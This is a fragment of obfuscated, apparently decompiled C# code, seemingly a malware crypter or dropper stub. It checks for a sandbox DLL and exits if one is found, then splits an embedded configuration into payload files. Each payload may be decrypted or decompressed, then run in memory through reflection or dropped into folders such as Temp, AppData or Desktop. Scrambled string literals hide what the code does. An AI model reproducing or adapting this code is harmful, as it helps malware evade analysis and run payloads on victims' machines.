if (Xcpjaqmaubj2y0o3n.GetModuleHandle(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SiDldlbel.l")).ToInt32() != 0)
|
|
{
|
|
int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u naSnbxeevrnethsapiaincno erni adoi niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SnbxeDtceadoi eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand);
|
|
Environment.Exit(0);
|
|
}
|
|
new Xcpjaqmaubj2y0o3n().bocln5xhicnup1rlmeg3v0wq5fq30ikg2();
|
|
}
|
|
|
|
private void ulry4uhtwnw50g04z(string xkcps1zic2cskbd1y)
|
|
{
|
|
string[] separator1 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Qslygidk2ydujmodz1hnjxa40is244mdu")
|
|
};
|
|
string[] separator2 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("swmnvnjfto3vjpznbcurldfzy")
|
|
};
|
|
string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None);
|
|
string empty1 = string.Empty;
|
|
string empty2 = string.Empty;
|
|
string empty3 = string.Empty;
|
|
for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
|
|
{
|
|
string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
|
|
byte[] numArray = rzo4euwupytyapwx03g5pnbwx.fuwrggsyeop321rci(strArray2[1]);
|
|
string str1 = strArray2[2];
|
|
bool boolean1 = Convert.ToBoolean(strArray2[3]);
|
|
string Ibpa121djgybg55fkysgepjc0y2qiasb2 = strArray2[4];
|
|
bool boolean2 = Convert.ToBoolean(strArray2[5]);
|
|
bool boolean3 = Convert.ToBoolean(strArray2[6]);
|
|
int int32 = Convert.ToInt32(strArray2[7]);
|
|
bool boolean4 = Convert.ToBoolean(strArray2[8]);
|
|
string str2 = this.yti5olupwaivlclet(Ibpa121djgybg55fkysgepjc0y2qiasb2);
|
|
if (boolean1)
|
|
{
|
|
if (boolean3)
|
|
numArray = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(numArray, int32);
|
|
if (boolean2)
|
|
numArray = this.P2dz552iekyo3s3by(numArray);
|
|
if (!boolean4)
|
|
{
|
|
try
|
|
{
|
|
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
|
|
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
|
|
{
|
|
(object) numArray,
|
|
(object) this.Ne4uiww2g1iuhqrgv,
|
|
null
|
|
});
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl nommr:ro netn on ieit eoy ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message);
|
|
}
|
|
}
|
|
else if (!this.Qhlb0achfvgjxeekj(numArray))
|
|
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl sn elcin ro netn on ieuigrfeto:"));
|
|
}
|
|
else
|
|
{
|
|
string Dutorh5b0eqbkqejp = str2 + str1;
|
|
if (boolean2)
|
|
numArray = this.P2dz552iekyo3s3by(numArray);
|
|
this.Xu4noszs2jndqy0uakulzk0hj(numArray, Dutorh5b0eqbkqejp, true);
|
|
}
|
|
}
|
|
}
|
|
|
|
private static void ooaqlrxjthzq5ykyeqamxwsxh(byte[] Amqk5npffix20x5qn5x2vnb3b)
|
|
{
|
|
try
|
|
{
|
|
Thread thread = new Thread(new ParameterizedThreadStart(Xcpjaqmaubj2y0o3n.pq0wico5ukmaxyfwlssnrl0r1nqartkt4));
|
|
thread.SetApartmentState(ApartmentState.STA);
|
|
thread.Start((object) Amqk5npffix20x5qn5x2vnb3b);
|
|
thread.Join();
|
|
}
|
|
catch
|
|
{
|
|
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false;
|
|
}
|
|
}
|
|
|
|
private string yti5olupwaivlclet(string Ibpa121djgybg55fkysgepjc0y2qiasb2)
|
|
{
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApiainPtplcto ah"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Application.StartupPath + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Tmep"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Path.GetTempPath();
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("ApaapDt"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("M ouetyDcmns"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Dstpeko"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ue rflsrPoie"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("UEPOIESRRFL")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Ibpa121djgybg55fkysgepjc0y2qiasb2 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("PormFlsrga ie"))
|
|
Ibpa121djgybg55fkysgepjc0y2qiasb2 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
return Ibpa121djgybg55fkysgepjc0y2qiasb2;
|
|
}
|
|
}
|
|
}
|